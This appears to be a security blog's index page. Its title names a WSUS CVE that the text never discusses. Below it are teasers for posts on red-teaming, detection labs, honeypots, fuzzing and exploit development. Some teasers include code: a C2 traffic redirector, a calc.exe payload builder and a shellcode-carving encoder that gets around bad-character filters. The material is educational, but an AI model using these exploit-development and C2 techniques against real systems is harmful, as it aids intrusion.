Inside CVE-2025-59287: SoapFormatter RCE in WSUS

Personal Computer Security Blog.

The need to assess large language model (LLM) applications has never been more pressing. Recognizing this urgency, the Open Web Application Security Project (OWASP) has taken the lead in understanding and addressing the security challenges posed by LLMs. OWASP has released successive Top 10 lists tailored to LLM applications, and every version has ranked prompt injection as the #1 vulnerability [1]. This consistent ranking highlights the significant risk prompt injection poses to systems built on language models and underscores the need for security professionals to dig into its complexities.

TLDR; Vulnerable-AD-Lab is an AD environment built for practicing AD security. The idea of this IaC project is to build a functional, vulnerable Active Directory lab from scratch without using VM templates. The project integrates WazeHell's vulnerable-AD script: https://github.com/WazeHell/vulnerable-AD. The final product of this automation script is a Windows Server 2019 machine with a misconfigured AD service and a Windows 10 workstation joined to the same domain.

In 2019, my team and I faced a challenge during an onsite penetration test. The client we were testing was located in a multistory building, which limited many of our attacks. This problem inspired me to develop a solution for getting around similar obstacles. I started exploring UAVs to build a penetration testing UAV capable of delivering Bluetooth, Wi-Fi, and network attacks. The findings were presented at RIT and uploaded to YouTube. If you are interested, check out my presentation.

TLDR: In this post, I will present Tunnel-Manager, a new solution for managing remote port-forwarding tunnels. If you use Nginx or Socat to forward your C2 traffic through multiple external servers, Tunnel-Manager helps you do so quickly and efficiently: it manages the remote tunnels and automates the creation and deletion of AWS nodes. Also, if your on-prem server sits behind NAT, remote port-forwarding tunnels let you expose one or more ports to the public and receive external connections.
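To make a single forwarding hop concrete, here is a minimal sketch of what one redirector does, roughly the job of a `socat TCP-LISTEN:<port>,fork TCP:<host>:<port>` instance: accept connections on a public port and relay bytes in both directions to an internal host. It is written with Python's asyncio, it is not Tunnel-Manager's code, and the helper names `forward` and `_pipe` are hypothetical.

```python
import asyncio


async def _pipe(reader: asyncio.StreamReader, writer: asyncio.StreamWriter) -> None:
    """Copy bytes from reader to writer until EOF, then close the writer."""
    try:
        while data := await reader.read(65536):
            writer.write(data)
            await writer.drain()
    finally:
        writer.close()


async def forward(listen_host: str, listen_port: int, dest_host: str, dest_port: int):
    """Listen on listen_host:listen_port and relay each connection to dest_host:dest_port."""

    async def handle(client_reader, client_writer):
        try:
            up_reader, up_writer = await asyncio.open_connection(dest_host, dest_port)
        except OSError:
            client_writer.close()  # upstream unreachable: drop the client
            return
        # Pump both directions concurrently; a reset on either side just ends the session.
        await asyncio.gather(
            _pipe(client_reader, up_writer),
            _pipe(up_reader, client_writer),
            return_exceptions=True,
        )

    return await asyncio.start_server(handle, listen_host, listen_port)
```

In practice you would await `forward(...)` with your own addresses and then `await server.serve_forever()` on the returned server. When either side reaches EOF, the sketch closes both directions instead of half-closing, which suits typical request/response C2 traffic but not every protocol.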

TLDR; This post is a walkthrough of the detection and analysis of the ransomware incident that was deployed as an extra/hidden inject in IRSeC 2021. If you were one of the blue teamers in that competition and couldn't analyze and recover from it, this walkthrough will help you understand how it works and how to recover the infected files.

TLDR: A year ago, I noticed that Windows thick clients often contain easy-to-spot vulnerabilities that lead to local privilege escalation (LPE). I developed an automation solution that crawls the web for Windows applications, downloads and installs them, and then runs static scans on the system after each target is installed. When it finds vulnerable software, it sends a notification to Slack. Using this project, I found more than 40 LPE vulnerabilities and 12 CVEs in a very short period. I called this project Miner (GitHub repository). This post briefly introduces the project and shows how to start using it.

TLDR: This post shows common exploitation methodologies with the exact steps needed to replicate them. The idea is to perform each step and study its effects on our monitoring systems. The sources of indicators in this case study are the IDPS integrated into Security Onion and the Kibana panels, which hold the operating system, service, security, and application logs of both the Windows and Linux VMs. We will simulate an attack scenario and find the gaps in these sources of indicators. For each gap, we will try to find indicators of compromise manually and then enhance the monitoring systems: based on the identified indicators of compromise, we will add Suricata and YARA rules and create new Sigma rules.

In this part, we will work with the Kolide Fleet agent, osquery, and Wazuh. We will go through installing and configuring the Kolide Fleet agent, osquery, Wazuh, and rsyslog on the Windows and Ubuntu instances, and we will set up the appropriate firewall rules on each instance, pfSense, and Security Onion. We will also go over setting up Wazuh, creating agent entries, and extracting their keys so the Windows and Linux instances can import them and connect to the server. Then, we will configure the Wazuh agent on Linux distributions manually. We will also cover connecting each instance to the Fleet server, both manually and with the Fleet launcher. After configuring every instance, we will review what we have built from a network perspective.

This series of posts is designed to give analysts a way to practice Red Teaming, Threat Hunting, and IR together. It will help you build a proper environment weaponized with SIEMs (security information and event management) and EDRs (endpoint detection and response), and study adversary methods, incident analysis and response techniques, and tools for detecting and analyzing attacks, malware, and other exploits.



An easy way to detect unauthorized access in a network is to deploy honeypots throughout it. In this post, I will go over a way to deploy resource-efficient internal honeypots. The objective of these honeypots is not to collect data but to alert us, via Slack channels, to threats coming from inside the network.
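A minimal sketch of such an alerting honeypot, assuming a TCP port that no legitimate service uses and a Slack incoming webhook. `SLACK_WEBHOOK_URL` is a placeholder, and `run_honeypot`, `format_alert`, and `post_to_slack` are hypothetical names rather than the post's implementation. The listener accepts a connection, sends one Slack message, and drops the connection, so it keeps no state and needs very few resources.

```python
import asyncio
import json
import urllib.request

# Hypothetical placeholder: replace with your own Slack incoming-webhook URL.
SLACK_WEBHOOK_URL = "https://hooks.slack.com/services/XXX/YYY/ZZZ"


def post_to_slack(text: str, webhook_url: str = SLACK_WEBHOOK_URL) -> None:
    """POST a message to a Slack incoming webhook (JSON body with a "text" field)."""
    request = urllib.request.Request(
        webhook_url,
        data=json.dumps({"text": text}).encode("utf-8"),
        headers={"Content-Type": "application/json"},
    )
    with urllib.request.urlopen(request, timeout=5) as response:
        response.read()


def format_alert(sensor: str, peer: tuple, local_port: int) -> str:
    return f"Honeypot {sensor}: connection from {peer[0]}:{peer[1]} to port {local_port}"


async def run_honeypot(host: str, port: int, sensor: str, notify=post_to_slack):
    """Listen on a decoy port; every connection triggers one alert and is then dropped."""

    async def on_connect(reader: asyncio.StreamReader, writer: asyncio.StreamWriter) -> None:
        peer = writer.get_extra_info("peername")
        local_port = writer.get_extra_info("sockname")[1]
        try:
            # No legitimate client should touch this port, so any connection is suspicious.
            # notify() may do blocking I/O, so run it in a worker thread.
            await asyncio.to_thread(notify, format_alert(sensor, peer, local_port))
        finally:
            writer.close()

    return await asyncio.start_server(on_connect, host, port)
```

The `notify` parameter is injectable, so alerts can be routed to another channel (or captured in tests) without touching Slack.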

Red Canary has ranked Process Injection as the number one threat observed in its customers' environments; more than 34% of organizations are affected by this threat, with more than 2,700 confirmed threats. Process Injection is a technique adversaries use to make legitimate processes carry out malicious activities. Adversaries also employ the technique so that their malicious code inherits the privileges of the injected legitimate process.

Nowadays, there are many command and control (C2) projects. However, most existing C2s operate on the operating system as a whole; we rarely see a C2 that controls a specific part of an operating system, such as a browser.

Cobalt Strike is the industry standard among C2 frameworks. It provides a post-exploitation agent and covert channels to emulate a long-term embedded actor in a network. Cobalt Strike can hide its communication in covert channels built on many different techniques.

TLDR; This is an entry-level post. It covers the concept of network-based fuzzing with Boofuzz, uses HTTP as an example to practice finding bugs in real-world HTTP server implementations, briefly reviews 6 different exploits, and finally shows the process of finding a new, previously unknown bug in an HTTP implementation.
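The core loop of network-based fuzzing can be sketched without any framework: keep a valid request as a template, replace one field at a time with "interesting" values, send each case, and check whether the server still accepts connections. The sketch below uses only Python's standard library rather than Boofuzz's API; the field names, the tiny `INTERESTING` list, and the helpers `render`, `mutations`, `target_alive`, and `fuzz` are assumptions for illustration. Boofuzz automates the same loop with a much larger mutation library and built-in target monitoring.

```python
import socket

# Baseline request fields; each test case replaces exactly one of them.
BASE_FIELDS = {"method": "GET", "uri": "/index.html", "version": "HTTP/1.1", "host": "127.0.0.1"}

# Hypothetical, deliberately tiny set of "interesting" values.
INTERESTING = ["A" * 5000, "%n%n%n%n", "/.." * 50, "", "\x00", "-1", "4294967296"]


def render(fields: dict) -> bytes:
    """Serialize the fields into a raw HTTP/1.1 request."""
    return (f"{fields['method']} {fields['uri']} {fields['version']}\r\n"
            f"Host: {fields['host']}\r\n\r\n").encode("latin-1")


def mutations():
    """Yield (field name, request bytes), fuzzing one field at a time."""
    for name in BASE_FIELDS:
        for value in INTERESTING:
            yield name, render({**BASE_FIELDS, name: value})


def target_alive(host: str, port: int, timeout: float = 2.0) -> bool:
    """Crude liveness check: can we still open a TCP connection?"""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def fuzz(host: str, port: int):
    """Return the first (field, request) after which the server stops accepting connections."""
    for field, request in mutations():
        try:
            with socket.create_connection((host, port), timeout=2.0) as s:
                s.sendall(request)
                s.recv(1024)  # read (part of) the reply, if any
        except OSError:
            pass  # a reset or timeout on one case is not necessarily a crash
        if not target_alive(host, port):
            return field, request
    return None
```

A `None` result only means the crude liveness check never failed; a real campaign would also watch the target process for crashes and hangs.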

TLDR; This is a basic, intro-level blog post that teaches how to use imported functions such as WinExec to develop a payload that spawns calc.exe in a restricted memory space.
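One building block such a payload typically needs is the NUL-terminated string "calc.exe" on the stack, built without a literal 00 byte, so its address can be passed to WinExec. The sketch below generates the x86 assembly text and opcodes for that step in Python. The helper name `push_string` is hypothetical, it only handles strings whose length is a multiple of 4, and resolving WinExec's address from the import table is target-specific and not shown.

```python
def push_string(s: str) -> list[tuple[str, bytes]]:
    """Return (asm, machine code) pairs that build s, NUL-terminated, on an x86 stack."""
    data = s.encode("ascii")
    if len(data) % 4:
        raise ValueError("sketch only handles strings whose length is a multiple of 4")
    instrs = [
        ("XOR EAX, EAX", bytes([0x31, 0xC0])),  # EAX = 0 without a 00 byte in the code
        ("PUSH EAX", bytes([0x50])),            # NUL terminator (plus padding)
    ]
    chunks = [data[i:i + 4] for i in range(0, len(data), 4)]
    for chunk in reversed(chunks):  # last chunk first: the stack grows downwards
        value = int.from_bytes(chunk, "little")
        instrs.append((f"PUSH 0x{value:08X}", b"\x68" + chunk))  # 68 id = PUSH imm32
    instrs.append(("MOV EBX, ESP", bytes([0x89, 0xE3])))  # EBX -> the string
    return instrs


for asm, code in push_string("calc.exe"):
    print(f"{code.hex(' '):<16} {asm}")
```

After this sequence EBX points at "calc.exe"; pushing the `uCmdShow` value and then EBX matches `WinExec(lpCmdLine, uCmdShow)` under stdcall, where arguments are pushed right to left.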



When exploit developers write exploits, they often run into restrictive character sets that limit the characters they can use in their shellcode. This is why tools like MSFvenom exist: MSFvenom helps exploit developers obfuscate shellcode and get around restrictive character sets using different encoders. This post goes over the methodology of encoding shellcode manually to understand how it really works. By the end of this post, you should be able to encode any shellcode. The methodology explained in this post is called shellcode carving: manipulating registers with mathematical operations to build shellcode that bypasses character restrictions.
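The arithmetic behind carving fits in a few lines. Assume EAX has been zeroed (a common idiom is two `AND EAX, imm32` instructions whose masks share no set bits) and that each target dword is produced by a chain of `SUB EAX, imm32` instructions followed by `PUSH EAX`. Then 0 - v1 - v2 - v3 = target (mod 2^32), that is, v1 + v2 + v3 = -target (mod 2^32), and the operands can be solved byte by byte while tracking carries so that every operand byte comes from the allowed set. The helpers `carve_dword` and `carve_asm` are hypothetical, not the post's tooling. They check only operand bytes, so in a real exploit the opcodes (`0x25` for AND EAX, `0x2D` for SUB EAX, `0x50` for PUSH EAX) and the AND masks must also survive the bad-character filter.

```python
from __future__ import annotations


def _sum_table(allowed: bytes, n_terms: int) -> dict[int, tuple[int, ...]]:
    """Map each sum reachable with n_terms allowed bytes to one combination producing it."""
    table = {0: ()}
    for _ in range(n_terms):
        nxt = {}
        for s, combo in table.items():
            for b in allowed:
                nxt.setdefault(s + b, combo + (b,))
        table = nxt
    return table


def carve_dword(target: int, allowed: bytes, n_terms: int = 3) -> list[int] | None:
    """Find n_terms dwords of allowed bytes so that SUBs from EAX = 0 leave EAX == target."""
    need = ((-target) & 0xFFFFFFFF).to_bytes(4, "little")  # v1 + ... + vn = -target mod 2**32
    table = _sum_table(bytes(sorted(set(allowed))), n_terms)

    def solve(pos: int, carry: int) -> list[tuple[int, ...]] | None:
        if pos == 4:
            return []  # a carry out of the top byte wraps away (mod 2**32)
        for s, combo in table.items():
            total = s + carry
            if total & 0xFF == need[pos]:
                rest = solve(pos + 1, total >> 8)
                if rest is not None:
                    return [combo] + rest
        return None  # no byte combination works with this incoming carry

    columns = solve(0, 0)  # columns[pos][k] is byte `pos` of operand k
    if columns is None:
        return None
    return [int.from_bytes(bytes(col[k] for col in columns), "little") for k in range(n_terms)]


def carve_asm(target: int, allowed: bytes, n_terms: int = 3) -> list[str] | None:
    values = carve_dword(target, allowed, n_terms)
    if values is None:
        return None
    # These AND masks share no set bits, so EAX becomes 0; check them against your own bad chars.
    return (["AND EAX, 0x554E4D4A", "AND EAX, 0x2A313235"]
            + [f"SUB EAX, 0x{v:08X}" for v in values]
            + ["PUSH EAX"])
```

For example, with an alphanumeric-only operand set, 0xFFCA8166 (the bytes 66 81 CA FF once pushed) has no three-term solution, because the second byte would need a sum outside the reachable range, but it does have a four-term one; adding SUB instructions widens the range of reachable sums.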